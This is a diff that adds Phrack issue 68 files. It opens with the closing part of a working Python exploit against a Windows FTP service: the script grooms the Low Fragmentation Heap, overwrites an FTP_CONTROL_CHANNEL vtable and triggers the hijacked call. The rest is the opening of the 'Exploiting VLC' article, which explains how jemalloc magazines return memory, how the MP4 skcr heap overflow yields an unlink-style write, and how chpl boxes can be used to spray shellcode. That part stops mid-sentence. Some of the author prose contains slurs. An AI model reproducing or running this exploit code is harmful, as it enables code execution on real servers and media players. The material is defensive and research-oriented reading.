+    analyze(buf)
+    s.send(buf)
+    s.close()
+
+    #create the initial amount of connections
+    print "[*] Creating CONNPOOL"
+    connpool = SoftLeak()
+    connpool.create_pool(CONNCOUNT)
+    time.sleep(WAITP)
+
+    #######################################################################
+    #The LFH UserBlock should look like this
+    #[previously_allocated_chunk][overwritten_chunk][malicious_chunk]
+    #1) We have to make an allocation for the chunk that was used in the 
+    #overflow (since it was freed)
+    #2) 'overwritten_chunk' should be all 0xFFs (including its 
+    #_HEAP_ENTRY header)
+    #3) the 'malicious_chunk' will use a FreeEntryOffset of 0xFFFF (saved 
+    #from previous allocation)
+    #
+    #Now we can allocate a bunch of FTP_CONTROL_CHANNEL objects (see 
+    #ftpsvc.dll) These will be in the heap, so when we add "UserBlocks + 
+    #(0x7FFF8 * 8)" it will point to heap memory that contains a 
+    #FTP_CONTROL_CHANNEL object, which has a vtable as its first 4 bytes
+    #
+    #If the trailing '\n' is missing from the ftp command the function
+    #FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine() will not be called 
+    #until it sees the final '\n', which gives us control over WHEN the 
+    #call will be made
+    #######################################################################
+    print "[*] Sending 0x%X USER commands" % CONNCOUNT
+    for i in range(0, CONNCOUNT):
+        name = "ftpcmd" + str(i)
+        connpool.alloc(name, "USER ")
+
+    #######################################################################
+    #1st: allocates a chunk saving its NextOffset
+    #   - NextOffset = The one after our 'malicious_chunk'
+    #2nd: allocates another, saving the tainted offset (0xFFFF)
+    #   - NextOffset = 0xFFFF
+    #3rd: will actually use the incorrect offset
+    #   - Return value will be addr_of(UserBlock) + (0x7FFF8 * 8)
+    #   - This is due to how the FreeEntryOffset is calculated
+    #
+    #The '$' * 0x170 will allocate 0x180 bytes, but will also be the data 
+    #used to overwrite the USER_SESSION objected called during logging
+    #The '$' characters would be replaced with values to start a ROP sled
+    #######################################################################
+    curr_char = 0x40
+    for i in range(0, 3):
+        curr_char += 1
+        name = "trigger" + str(i)
+        payload = "$$$$ " + (chr(curr_char) * 0x170) #allocates 0x180 bytes
+        print "[*] Sending payload%d of %d bytes" % (i, len(payload))
+        lfhpool.alloc(name, payload)
+
+
+    #######################################################################
+    #By sending the trailing '\n' command, this will force the
+    #FTP_CONTROL_CHANNEL to call its AsyncCompletionRoutine(), notifying
+    #the server that the connection has been completed. Fortunately for us
+    #this function pointer will have been overwritten by the 3rd iteration
+    #in the code above "payload = "PASS " + (chr(curr_char) * 0x170)".
+    #######################################################################
+    print "[*] Sending completing commands"
+    start = 0
+    end = CONNCOUNT
+    print "Total completions: %d" % (end - start)
+    for i in range(start, end):
+        name = "ftpcmd" + str(i)
+        print name
+        connpool.realloc(name, "\n")
+
+    #######################################################################
+    #By waiting to exit, we will ensure that the AsyncCompletionRoutine is
+    #NOT called due to  the socket closing. It shouldn't matter, since 
+    #we've already triggered it above, but just to be safe
+    #######################################################################
+    print "[*] Exploit complete!"
+    print "Press enter to exit"
+    val = sys.stdin.readline()
+
+if __name__ == "__main__":
+    main()
+
+
+--[ EOF
diff --git a/phrack68/13.txt b/phrack68/13.txt
new file mode 100644
index 0000000..4f2cfac
--- /dev/null
+++ b/phrack68/13.txt
@@ -0,0 +1,2263 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x0d of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-------------=[       The Art of Exploitation       ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ Exploiting VLC ]=---------------------------|
+|=------------=[ A case study on jemalloc heap overflows ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[    huku | argp    ]=------------------------=|
+|=--------------------=[  {huku,argp}@grhack.net  ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+--[ Table of contents
+
+ 1 - Introduction
+   1.1 - Assumptions
+ 2 - Notes on jemalloc magazines
+   2.1 - Your heap reversed
+   2.2 - Your reversed heap reversed again
+   2.3 - Sum up of jemalloc magazine facts
+ 3 - 'MP4_ReadBox_skcr()' heap overflow vulnerability
+   3.1 - MP4 file format structure
+   3.2 - Vulnerability details
+   3.3 - Old is gold; 'unlink()' style ftw
+   3.4 - Controlling 'p_root' data
+   3.5 - MP4 exploitation sum up
+ 4 - Real Media 'DemuxAudioSipr()' heap overflow vulnerability
+   4.1 - VLC as a transcoder
+   4.2 - RMF? What's that?
+   4.3 - Vulnerability details
+   4.4 - 'p_blocks' all over the place
+   4.5 - RMF summary
+ 5 - Building a reliable exploit
+   5.1 - Overall process
+   5.2 - Detecting 'p_root' address candidates
+ 6 - Demonstration
+ 7 - Limitations
+ 8 - Final words
+ 9 - References
+10 - T3h l337 c0d3z
+
+
+--[ 1 - Introduction
+
+The idiom 'exploitation is an art' has been written in Phrack so many
+times that it has probably ended up sounding cliche. With the emergence
+of ASLR, NX, stack cookies, 'unlink()' protections and so on, exploit
+writers seem to have realized the value of their code and have stopped
+sharing their work with ugly faggots (you know who you are). Just have
+a look at the various mailing lists and exploit archives; even the tons
+of Linux kernel exploits found there are almost trash. Obviously it's not
+the exploit writers that have lost their abilities; it's probably because
+they don't care to share fully weaponized code (that's only a privilege of
+people who pay for [censored] or [censored] lulz). The fact that working
+exploits have stopped being released doesn't necessarily mean that the
+underground has stopped their development. Although there's no way for
+us to know, we believe we would all be amazed if we were to have even a
+glimpse of what the underground has to offer (watch and learn: [1], [2]).
+
+In order to develop the exploit presented in this article, we spent about
+a month of continuous late nights in front of ugly terminals, eating junk
+and taking breaks only to piss and shit (funny times). We managed to
+develop a reliable local exploit for VLC. By 'almost' we mean that it is
+possible to make our code 100% reliable but some work is still required;
+we wish we had more time but Phrack had to be released. More details
+on how to extend our code and bypass the limitations that confine its
+reliability are given at a later section. It would probably be a fun
+pastime for someone to continue from where we left off; it's not that
+hard after all the bullshit we had to face. We hope to show you why
+developing an exploit nowadays requires hard work, dedication and at
+least one memleak ;)
+
+This phile was at first meant to be part of our jemalloc research also
+presented in this Phrack issue. Nevertheless, the Phrack staff honored us
+by asking if we were willing to write a separate text with an in-depth
+analysis of all that voodoo we had to perform. Readers might agree that
+VLC is not the most exotic target one can come up with, but we decided
+not to disclose any 0day vulnerabilities and keep it going with a list
+of already published material, found by carefully looking for advisories
+tagged as 'heap based overflows' (we could have googled for 'potential
+DoS' as well, since it usually means ring0 access ;). Keep in mind that
+we wouldn't like to present a vulnerability that would be trivial to
+exploit. We were looking for a target application with a large codebase;
+VLC and Firefox were our primary candidates. We finally decided to deal
+with the first. The result was a local exploit that does not require
+the user to give any addresses; it can figure out everything by itself.
+
+
+----[ 1.1 - Assumptions
+
+For the shake of writing this article...
+
+1 - We assume that the attacker has local access on a server running VLC.
+The VLC instance must have at least one of its several control interfaces
+enabled (HTTP via --extraintf, RC via --rc-host or --rc-unix), that
+will be used to issue media playback requests to the target and make
+the whole process interactive, that is VLC should be running in 'daemon'
+mode. Most people will probably think that those control interfaces can
+also be used to perform a remote attack; they are right. Although, the
+MP4 vulnerability exploited in this article cannot be used for remote
+exploitation, developing a reliable remote exploit is, indeed, feasible
+and in fact, it's just a matter of modifying the attached code.
+
+  Note: Remote exploitation using MP4 files can be performed by streaming
+  MP4 data to the VLC server. Unfortunately, MP4 streams are handled by
+  libffmpeg while MP4 files by VLC's custom MP4 demuxer. Don't get us
+  wrong, we don't believe that ffmpeg is bug-free; it might be vulnerable
+  to the exact same flaw, we just didn't have the time to investigate
+  it further.
+
+2 - VLC cannot be run as root, so, don't expect uid 0 shells. We will
+only try to stress the fact that some people will go to great lengths
+to have your ass in their plate. Hacking is all about information,
+the more information the easier for you to elevate to root.
+
+3 - We assume our target is a x86 machine running FreeBSD-8.2-RELEASE,
+the exact same version we used during our main jemalloc research.
+
+4 - Last but not least, we assume you have read and understood our
+jemalloc analysis. We don't expect you to be a jemalloc ninja, but
+studying our work the way you do your morning newspaper will not get
+you anywhere either ;)
+
+
+--[ 2 - Notes on jemalloc magazines
+
+----[ 2.1 - Your heap reversed
+
+In our main jemalloc research we discussed the use of 'magazines' as a
+thread contention avoidance mechanism. Briefly, when a process spawns
+multiple threads, a global variable called '__isthreaded' is set to
+true. This variable, which can be accessed via the 'extern' storage
+class specifier by any application, instructs jemalloc to initialize
+thread-local data structures for caching heap allocations. Those
+data structures, the so called 'magazines', are allocated and populated
+in a lazy fashion. In the case of 'malloc()', a threaded application
+will eventually reach the 'if' clause shown below ('MALLOC_MAG' and
+'opt_mag' are enabled by default).
+
+
+#ifdef MALLOC_MAG
+static __thread mag_rack_t *mag_rack;
+#endif
+
+...
+
+static inline void *
+arena_malloc(arena_t *arena, size_t size, bool zero)
+{
+  ...
+
+  if(size <= bin_maxclass) {
+#ifdef MALLOC_MAG
+    if(__isthreaded && opt_mag) {
+      mag_rack_t *rack = mag_rack;
+      if(rack == NULL) {
+        rack = mag_rack_create(arena);
+        if(rack == NULL)
+          return (NULL);
+        mag_rack = rack;
+      }
+      return(mag_rack_alloc(rack, size, zero));
+    }
+    ...
+#endif
+
+  ...
+}
+
+
+The first point of interest is the '__thread' classifier in the
+declaration of 'mag_rack'. This specifier instructs gcc/binutils to
+make use of the, so called, TLS (Thread Local Storage) mechanism. The
+'__thread' declarations are grouped and then act as a prototype for
+the initialization of each thread. Simply put, each thread spawned via
+'pthread_create()' will inherit its own private copy of 'mag_rack'
+initialized to 'NULL' since it's also declared as 'static'. Access to
+thread local memory is transparent to the user; each time 'mag_rack'
+is referenced, the runtime automatically figures out where the thread's
+private memory can be found.
+
+It's now easier to understand how 'arena_malloc()' will act once
+'__isthreaded' and 'opt_mag' are set to true. First the existing
+'magazine rack' pointer is checked; if NULL, 'mag_rack_create()' will
+be called to (a) initialize the 'mag_rack_t' structure and (b) populate
+it with preallocated memory regions for the bin that corresponds to the
+requested size (notice that magazine racks are only used for bin-sized
+allocations; larger ones follow another code path).
+
+Assume a random thread in a random application calls 'malloc(4)'. The
+instruction pointer will soon reach a call to 'mag_rack_alloc(mag_rack,
+4, false);'.
+
+
+static inline void *
+mag_rack_alloc(mag_rack_t *rack, size_t size, bool zero)
+{
+  void *ret;
+  bin_mags_t *bin_mags;
+  mag_t *mag;
+  size_t binind;
+
+  binind = size2bin[size]; /* (1) */
+  ...
+
+  bin_mags = &rack->bin_mags[binind]; /* (2) */
+
+  mag = bin_mags->curmag; /* (3) */
+  if (mag == NULL) {
+    /* Create an initial magazine for this size class. */
+
+    mag = mag_create(choose_arena(), binind);
+
+    bin_mags->curmag = mag;
+    mag_load(mag);
+  }
+
+  ret = mag_alloc(mag);
+  ...
+
+  return (ret);
+}
+
+
+The input size is converted to a bin index (1), for a size of 4,
+'binind' will be set to 0. Each magazine rack has its own set of bins
+which are private to the thread (2). Variable 'mag' is set to point to
+the rack's 'magazine' for this specific bin size (3). A 'magazine' is a
+simple array of void pointers, called 'rounds[]', that holds addresses
+of preallocated memory regions of equal size. Function 'mag_load()' is
+called to initialize it. Here's where things start to get more interesting
+and may influence the exploitation process in a significant way. Skimming
+through 'mag_load()' reveals the following:
+
+
+static void
+mag_load(mag_t *mag)
+{
+  ...
+  arena = choose_arena(); /* (1) */
+  bin = &arena->bins[mag->binind];
+
+  for (i = mag->nrounds; i < max_rounds; i++) {
+    ...
+
+    round = arena_bin_malloc_easy(arena, bin, run); /* (2) */
+    ...
+
+    mag->rounds[i] = round;
+  }
+  ...
+
+  mag->nrounds = i;
+  ...
+}
+
+
+Depending on the build configuration, 'choose_arena()' (1) may statically
+assign a thread to the same arena or dynamically to a different one
+every time it gets called. No matter what the assignment process looks
+like, we can see that at (2), the 'rounds[]' array is populated by a
+normal call to 'arena_bin_malloc_easy()' (or 'arena_bin_malloc_hard()');
+the function that a process would call had it not been threaded. Since
+the heap internals work in a purely deterministic way (for now ignore
+the inherent non-determinism regarding thread scheduling), we can be
+quite sure that the regions whose addresses are stored in 'rounds[]'
+will probably be contiguous. Assuming no holes are found in the heap
+(which is easy to assume since an experienced exploit developer knows
+how to fill them), the regions returned by 'arena_bin_malloc_xxx()'
+will be in increasing memory addresses as shown in the following figure.
+
+
+            Run (PAGE_SIZE) that services 4byte allocations
+                   .-------.-------.-----.-------.
+        0xdeadb000 | reg 1 | reg 2 | ... | reg N |
+                   '-------'-------'-----'-------'
+                       ^       ^      ^
+                       |     .-'      '--.
+                       |     |           |
+                    .-----.-----.-----.-----.
+                    |  0  |  1  | ... |  M  |
+                    '-----'-----'-----'-----'
+                         rounds[] array
+
+
+Once initialization is complete, we return back to 'mag_rack_alloc()'
+that calls 'mag_alloc()' to pick an entry in the 'rounds[]' array to
+give to the user.
+
+
+mag_alloc(mag_t *mag) {
+  if (mag->nrounds == 0)
+    return (NULL);
+
+  mag->nrounds--; /* (1) */
+
+  return (mag->rounds[mag->nrounds]); /* (2) */
+}
+
+
+If this is the first allocation taking place in the thread, 'mag_alloc()'
+will return the last element of the 'rounds[]' array. The 'malloc(4)'
+calls that may follow will be served by the exact same magazine with
+regions in decreasing memory addresses! That is, magazines are populated
+in a 'forward' fashion but consumed in 'backward' one so that if you
+allocate, for example, 3 regions, their memory order will be 321 instead
+of 123 :)
+
+
+----[ 2.2 - Your reversed heap reversed again
+
+As explained in our main jemalloc article, '__isthreaded' is set to true
+after a successful call to 'pthread_create()' (in fact, it is enabled by
+libthr) and remains as such until the end of the program's lifetime, that
+is, joining the threads will not set '__isthreaded' to 0. Consequently,
+once the magazine racks have been initialized, jemalloc will keep using
+them no matter what the number of active threads is.
+
+As explained in the previous section, continuous allocations serviced by
+magazines, may return memory regions in decreasing memory addresses. We
+keep using the word 'may' because this is not always the case. Consider
+the following code snippet which we advise that you read carefully:
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <unistd.h>
+
+extern int __isthreaded;
+void *allocs[10];
+
+void start_allocs(void) {
+  int i;
+  printf("Allocating regions\n");
+  for(i = 0; i < 10; i++) {
+    allocs[i] = malloc(192);
+    printf("%p\n", allocs[i]);
+  }
+  return;
+}
+
+void free_allocs(void) {
+  int i;
+  printf("Freeing the regions\n");
+  for(i = 0; i < 10; i++)
+    free(allocs[i]);
+  return;
+}
+
+void free_allocs_rev(void) {
+  int i;
+  printf("Freeing the regions in reverse order\n");
+  for(i = 10 - 1; i >= 0; i--)
+    free(allocs[i]);
+  return;
+}
+
+void *thread_runner(void *p) {
+  int rev = *(int *)p;
+
+  sleep(1);
+
+  if(rev)
+    free_allocs_rev();
+  else
+    free_allocs();
+
+  start_allocs();
+  return NULL;
+}
+
+int main(int argc, char *argv[]) {
+  pthread_t tid;
+  int rev = 0;
+
+  if(argc > 1)
+    rev = atoi(argv[1]);
+
+  start_allocs();
+  pthread_create(&tid, NULL, thread_runner, (void *)&rev);
+  pthread_join(tid, NULL);
+  return 0;
+}
+
+
+There are three important functions in the code above; 'start_allocs()'
+which allocates 10 memory regions that will be serviced by bin-192,
+'free_allocs()' that frees the aforementioned regions in a 'forward'
+fashion and 'free_allocs_rev()' that will do the same thing but in reverse
+order. The 'allocs[]' array holds pointers to allocated regions. On
+startup, 'main()' will call 'start_allocs()' to populate 'allocs[]'
+and then will fire up a thread that will free those regions. Carefully
+looking at jemalloc's code, reveals that even on deallocation, a new
+magazine rack will be allocated and the regions being freed will be
+eventually inserted in the thread's magazine for that specific size class!
+You can think of that as the memory regions changing ownership; regions
+belonging to the main thread, become property of the new thread started by
+'pthread_create()'.
+
+Once the new thread calls 'start_allocs()', the exact same regions that
+were previously freed will be eventually be returned to the caller. The
+order by which they will be returned, depends on the way they were freed
+in the first place. Let's run our test program above by passing it the
+value 0 in 'argv[1]'; this will ask the thread to free the regions in
+the normal way.
+
+
+[hk@lsd ~]$ ./test 0
+Allocating regions
+0x282070c0
+0x28207180
+0x28207240
+0x28207300
+0x282073c0
+0x28207480
+0x28207540
+0x28207600
+0x282076c0
+0x28207780
+Freeing the regions
+Allocating regions
+0x28207780
+0x282076c0
+0x28207600
+0x28207540
+0x28207480
+0x282073c0
+0x28207300
+0x28207240
+0x28207180
+0x282070c0
+
+
+As you can see, the calls to 'malloc()' performed by the thread, return
+the regions in reverse order; this is very similar to what the previous
+section explained. Now let's free the regions allocated by 'main()'
+by calling 'free_allocs_rev()':
+
+
+[hk@lsd ~]$ ./test 1
+Allocating regions
+0x282070c0
+0x28207180
+0x28207240
+0x28207300
+0x282073c0
+0x28207480
+0x28207540
+0x28207600
+0x282076c0
+0x28207780
+Freeing the regions in reverse order
+Allocating regions
+0x282070c0
+0x28207180
+0x28207240
+0x28207300
+0x282073c0
+0x28207480
+0x28207540
+0x28207600
+0x282076c0
+0x28207780
+
+
+Interestingly, the regions are returned in the same order as they were
+allocated. You can think of that as the 'rounds[]' array in 'mag_load()'
+being reversed; the allocations are freed in the reverse order and
+placed in 'rounds[]' but 'mag_alloc()' gives out regions in reverse
+order too... Reverse + reverse = obverse ;)
+
+So why this is important? Regions of a commonly used size (e.g 64), are
+usually allocated by a program before 'pthread_create()' is called. Once a
+thread is created and '__isthreaded' is set to true, freeing those regions
+may result in some thread becoming their master. Future allocations from
+the thread in question, may return regions in the normal way rather than
+in decreasing memory addresses as shown in the previous section. This
+a very important observation that an exploit coder must keep in mind
+while targeting FreeBSD applications or any program utilizing jemalloc.
+
+In the sections to follow, we will be dealing with two vulnerabilities;
+one in the MP4 demuxer and one in the RMF parser. The first concerns
+4-byte allocations which are not that common. As a result, VLC which
+is a multithreaded application, will by default return such regions in
+decreasing locations. On the contrary, the RMF vulnerability is related
+to 192-byte regions, which, being larger, are more common. Several 192-byte
+allocations may have been created or destroyed before 'pthread_create()'
+is called and thus we cannot guarantee their re-allocation order. It
+is for this purpose that we have to employ more tricks for the latter
+vulnerability.
+
+
+----[ 2.3 - Sum up of jemalloc magazine facts
+
+To sum up:
+
+1 - While in glibc and dlmalloc you were used to seeing new memory
+regions getting allocated in higher addresses, this is not the case with
+jemalloc. If magazines are enabled, continuous allocations may return
+regions in decreasing memory order. It's quite easy for anyone to verify
+by pure observation.
+
+2 - Don't get 1 for granted. Depending on the order the allocations were
+performed, even if thread magazines are enabled, memory regions may end
+up being returned in the normal order. This, for example, can happen when
+memory regions that were allocated before the first thread is spawned,
+are eventually freed by one of the threads.
+
+3 - Always remember that jemalloc does not make use of meta-information
+embedded within the regions themselves. The fact that there are no
+inline metadata bordering the end user allocations sounds like good
+news. It's both a wise design choice and a powerful primitive in the
+attacker's hands.
+
+4 - For i = 0 ... 10 goto 1
+
+
+--[ 3 - 'MP4_ReadBox_skcr()' heap overflow vulnerability
+
+----[ 3.1 - MP4 file format structure
+
+The very first vulnerability we will be analyzing is a heap overflow
+within VLC's MP4 demuxer [4]. As stated earlier, VLC's builtin MP4
+demuxer is only used for local files, as opposed to network streams that
+go through an alternate code path, ending up being handled by libffmpeg
+code. Properly parsing a media file is a very cumbersome task involving
+complex sanity checks. File format parsers and especially those related
+to media files have been the root cause of many vulnerabilities in the
+past (remember all that 'RIAA employing Gobbles to pwn media players' [3]
+bullshit?). We are definitely not experts when it comes to multimedia
+formats; we will only take a look at how an MP4 file is structured, no
+details will be given on signal processing and encoding/decoding stuff,
+since the actual vulnerability is by no means related to the mathematics
+involved in the MP4 specifications (we imagine that there are juicy bugs
+there too ;)
+
+Briefly, an MP4 file looks like a tree of nodes serialized in a depth
+first order with the root node coming first (people that have experience
+with DWARF will probably notice the similarities). Tree nodes are split
+in two categories: containers and leaf nodes, also known as 'boxes',
+with the later holding the media information (both data and metadata) and
+the first playing the role of logically connecting its children. There
+are several types of boxes (frma, skcr, dref, url, urn, etc.) as well as
+several types of containers (ftyp, udta, moov, wave, etc.).
+
+  Easter egg: We believe URLs embedded withing MP4 meta-information,
+  which are normally used to fetch artist names, cover artwork and so on,
+  may also be used for performing web attacks. Let us know if you have
+  experience on this ;) Dear Anonymous, did you know that sharing such
+  media files in P2P networks may be used for more uniformly distributed
+  attacks?
+
+Each tree node, weather a container or a box, is represented by a
+structure called 'MP4_Box_t' defined in modules/demux/mp4/libmp4.h:970:
+
+
+typedef struct MP4_Box_s {
+  off_t i_pos;           /* Offset of node in the file */
+  uint32_t i_type;       /* Node type */
+  ...
+  uint64_t i_size;       /* Size of data including headers etc */
+  MP4_Box_data_t data;   /* A union of pointers; depends on 'i_type' */
+
+  /* Tree related pointers */
+  struct MP4_Box_s *p_father;
+  struct MP4_Box_s *p_first;
+  struct MP4_Box_s *p_last;
+  struct MP4_Box_s *p_next;
+} MP4_Box_t;
+
+
+The vulnerability lies in the function responsible for parsing boxes of
+type 'skcr'.
+
+
+----[ 3.2 - Vulnerability details
+
+For each box type, a dispatch table is used to call the appropriate
+function that handles its contents. For 'skcr' boxes, 'MP4_ReadBox_skcr()'
+is responsible for doing the dirty work.
+
+
+/* modules/demux/mp4/libmp4.c:2248 */
+static int MP4_ReadBox_skcr(..., MP4_Box_t *p_box) {
+  MP4_READBOX_ENTER(MP4_Box_data_frma_t);
+
+  MP4_GET4BYTES(p_box->data.p_skcr->i_init);
+  MP4_GET4BYTES(p_box->data.p_skcr->i_encr);
+  MP4_GET4BYTES(p_box->data.p_skcr->i_decr);
+
+  ...
+}
+
+
+'MP4_READBOX_ENTER()' is a macro that, among other things, will allocate a
+structure of the given type and store it in 'p_box->data.p_data'. Macro
+'MP4_GET4BYTES()' will just read 4 bytes off the input stream and store
+it in the region pointed by the argument. While messing with the VLC
+internals, it's good to keep in mind that integers in MP4 files (as well
+as other media types) are in big endian order.
+
+The vulnerability is kind of obvious; instead of allocating a
+'MP4_Box_data_skcr_t' structure, 'MP4_ReadBox_skcr()' allocates
+an 'MP4_Box_data_frma_t', but later on, the pointer is assumed to
+point to a struct of the first type (notice how 'MP4_GET4BYTES()' is
+used; the 'data' union of the 'MP4_Box_t' is assumed to point to the
+correct structure). 'MP4_Box_data_frma_t', on x86, is 4 bytes long but
+'MP4_ReadBox_skcr()' will treat it as having a size of 12 bytes (the
+real size of 'MP4_Box_data_skcr_t'), resulting in 8 bytes being written
+off the heap region boundaries.
+
+
+----[ 3.3 - Old is gold; 'unlink()' style ftw
+
+The very first thing to note is the size of the victim structure (the
+one being overflown). 'MP4_Box_data_frma_t' has a size of 4 bytes, so,
+it is handled by jemalloc's bin for this specific size class (depending on
+the variant, 4 may or may not be the smallest bin size). As a consequence,
+the 8 bytes written outside its bounds can only influence neighboring
+allocations of equal size, namely 4. Exploit developers know that the
+heap has to be specially prepared before triggering an overflow. For
+this specific vulnerability, the attacker has to force VLC place
+4-byte allocations of interest next to the victim structure. Looking
+carefully in libmp4.h, reveals the following two box types which seem
+to be interesting:
+
+
+typedef struct {
+  char *psz_text;
+} MP4_Box_data_0xa9xxx_t;
+
+...
+
+typedef struct MP4_Box_data_cmov_s {
+  struct MP4_Box_s *p_moov;
+} MP4_Box_data_cmov_t;
+
+
+Obviously, both structures are 4 bytes long and thus good target
+candidates. 'MP4_Box_data_0xa9xxx_t' holds a pointer to a string we
+control, and 'MP4_Box_data_cmov_t' a pointer to some 'MP4_Box_t' whose
+type and contents may be partially influenced by the attacker. Let's focus
+on the 'cmov' box first and why that 'p_moov' pointer is interesting. What
+can we do if we eventually manage to place a 'cmov' box next to the victim
+'frma' structure?
+
+
+/* modules/demux/mp4/libmp4.c:2882 */
+MP4_Box_t *MP4_BoxGetRoot(...) {
+  ...
+
+  /* If parsing is successful... */
+  if(i_result) {
+    MP4_Box_t *p_moov;
+    MP4_Box_t *p_cmov;
+
+    /* Check if there is a cmov... */
+    if(((p_moov = MP4_BoxGet(p_root, "moov")) &&
+        (p_cmov = MP4_BoxGet(p_root, "moov/cmov"))) ||
+       ((p_moov = MP4_BoxGet(p_root, "foov")) &&
+        (p_cmov = MP4_BoxGet(p_root, "foov/cmov")))) {
+
+      ...
+      p_moov = p_cmov->data.p_cmov->p_moov; /* (1) */
+      ...
+      p_moov->p_father = p_root; /* (2) */
+      ...
+    }
+  }
+
+  return p_root;
+}
+
+
+'MP4_BoxGetRoot()' is the entry point of VLC's MP4 file parser. The
+first 'if' block is entered when parsing has finished and everything
+has gone smoothly; only fatal errors are taken into account. Certain
+erroneous conditions are gracefully handled by aborting the parsing
+process of the current tree node and continuing to the parent. The
+second 'if' block looks up the 'cmov' box and, if one is found, VLC
+will store the 'p_cmov->p_moov' in a local variable called 'p_moov'
+(1). If we manage to overwrite the 'cmov' structure, then the value of
+'p_moov' may arbitrarily be set by us. Then, at (2), an 'unlink()' style
+pointer exchange takes place which will allow us to write the 'p_root'
+pointer on a memory region of our choice.
+
+But wait a minute... We control the address that 'p_root' is written
+to, not 'p_root' nor the contents of the memory it points to. We need
+to figure out a way of affecting the data at the location pointed to by
+'p_root'. If we get to do that, then writing 'p_root' in a properly
+selected .got entry may result in code execution.
+
+For now, let's forget about 'p_root' and find a way of overwriting the
+'p_moov' field of a 'cmov' box. First we need to perform several 4-byte
+allocations to stabilize the heap and make sure that the 8 bytes to
+be written to the adjacent regions will not end up in neighboring
+run/chunk metadata. Such a situation may cause a segmentation fault on
+the next call to 'malloc()'; that's something we would definitely like
+to avoid. The tool for performing user controlled allocations is called
+'MP4_ReadBox_0xa9xxx()', the function responsible for parsing boxes of
+type 'MP4_Box_data_0xa9xxx_t'. A careful look at its code reveals that
+we can allocate a string of any size we please; 'AAA\0' is exactly what
+we need right now ;)
+
+Now recall that in certain cases, when the target application is
+threaded and has 'opt_mag' enabled, jemalloc will return memory regions
+in descending memory addresses which is the case with VLC during the
+MP4 parsing process. Extra threads are created and used to pre-process
+the files, download album artwork and so on. What we really need to do
+is force the heap to be shaped as shown below:
+
+
+      ...[SKCR][JUNK][CMOV][AAA\0][AAA\0][AAA\0]...[AAA\0]...
+      -                                                     +
+
+
+'JUNK' stands for a 1-byte allocation caused by a call to 'strdup("")'
+right after 'cmov' is created. The 1-byte allocation ends up being serviced
+by bin-4 since 4 is the minimum allocation granularity for the jemalloc
+variant used in FreeBSD-8.2-RELEASE. The heap layout depicted above is
+pretty straightforward to achieve; the attacker just creates a container
+that holds several '0xa9xxx' boxes followed by 'cmov' and then an 'skcr'
+that will overwrite the 'JUNK' and the 'p_moov' field of the 'cmov'
+neighbor. The multithreading nature of VLC will result in the boxes
+being allocated in reverse order, exactly as shown above.
+
+We have successfully managed to overwrite the 'p_moov' pointer that acts
+as the destination address in the 'unlink()' style pointer exchange. The
+question of how we can control 'p_root' still remains unanswered.
+
+
+----[ 3.4 - Controlling 'p_root' data
+
+Long nights of auditing VLC revealed that there's no easy way for us to
+control the memory contents pointed by 'p_root'. Although we had began
+feeling lost, we came up with a very daring idea that, although dangerous
+at first hearing, we were quite confident that would eventually work
+fine: Why not somehow 'free()' the 'p_root' region? Releasing 'p_root'
+memory and performing several 64-byte (= sizeof(MP4_Box_t)) allocations
+will force jemalloc give 'p_root' back to us. '0xa9xxx' boxes can be
+used to perform user controlled allocations, so, theoretically are ideal
+for what we need. Suppose 'p_root' is freed, then a series of 'a9xxx'
+boxes that contain 64-byte opcodes will result in 'p_root' eventually
+holding our shellcode payload... Right?
+
+Two questions now arise. First, how can one know the address of 'p_root'
+in order to free it? This is a good question, but it's something we will
+be dealing with later. Second, each '0xa9xxx' box results in two 64-byte
+allocations; one for the 'MP4_Box_t' structure to hold the box itself and
+one for the string that will contain our shellcode. How can we guarantee
+that 'p_root' will be given back by jemalloc for the string allocation and
+thus not for the 'MP4_Box_t'? This is where 'chpl' boxes come in handy:
+
+
+/* modules/demux/mp4/libmp4.c:2413 */
+static int MP4_ReadBox_chpl(..., MP4_Box_t *p_box) {
+  MP4_READBOX_ENTER(MP4_Box_data_chpl_t);
+
+  MP4_GET1BYTE( p_chpl->i_chapter );  /* Chapter count; user controlled */
+
+  for(i = 0; i < p_chpl->i_chapter; i++) {
+    ...
+    MP4_GET1BYTE( i_len );  /* Name length; user controlled */
+
+    p_chpl->chapter[i].psz_name = malloc(i_len + 1);
+    ...
+
+    /* 'psz_name' contents; user controlled */
+    memcpy( p_chpl->chapter[i].psz_name, p_peek, i_copy );
+    ...
+  }
+  ...
+}
+
+
+Each 'chpl' box can be used to perform a series of 254 allocations of 64
+bytes thus increasing the possibility that 'p_root' will be returned for
+our data, not for the 'MP4_Box_t' that describes the 'chpl' node (254/255
+versus 1/255; without even taking into account the determinism of heap
+internals).
+
+We have successfully located a gadget that will allow us to control
+'p_root' data but only once the latter has been freed. Now recall that
+'a9xxx' boxes are 4 bytes long and can thus be placed right next to the
+victim 'frma' structure. Don't forget that at this specific time frame
+of the execution, bin sized allocations are always serviced by magazine
+racks and thus decreasing addresses are eventually returned to the user.
+
+
+                ...[SKCR][A9XXX][A9XXX]...
+                -                        +
+
+
+Each call to 'MP4_ReadBox_skcr()' will write 8 bytes off the 'skcr'
+boundaries, so, both of the following 'a9xxx' regions will be overflown
+resulting in their 'psz_text' pointer being overwritten with user
+controlled values. If we could somehow force the 'a9xxx' nodes to be
+freed, their 'psz_text' would be passed to 'free()' as well, resulting
+in the release of two heap regions chosen by the attacker. It turns out
+that doing so is not that hard. All we have to do is place those 'skcr'
+and 'a9xxx' boxes within a common container, which will cause a parsing
+error right after the 'skcr' box is parsed. To do that, we abuse a new
+type of MP4 box called 'stts':
+
+
+/* modules/demux/mp4/libmp4.c:788 */
+static int MP4_ReadBox_stts(..., MP4_Box_t *p_box) {
+
+  MP4_READBOX_ENTER(MP4_Box_data_stts_t);
+  ...
+  MP4_GET4BYTES(p_box->data.p_stts->i_entry_count);
+
+  p_box->data.p_stts->i_sample_count =
+    calloc(p_box->data.p_stts->i_entry_count, sizeof(uint32_t)); /* (1) */
+  ...
+
+  if(p_box->data.p_stts->i_sample_count == NULL ...) {
+    MP4_READBOX_EXIT(0);
+  }
+  ...
+}
+
+
+At (1), 'i_entry_count' is, obviously, user controlled. Forcing it to
+hold a very high value will result in 'calloc()' returning NULL and thus
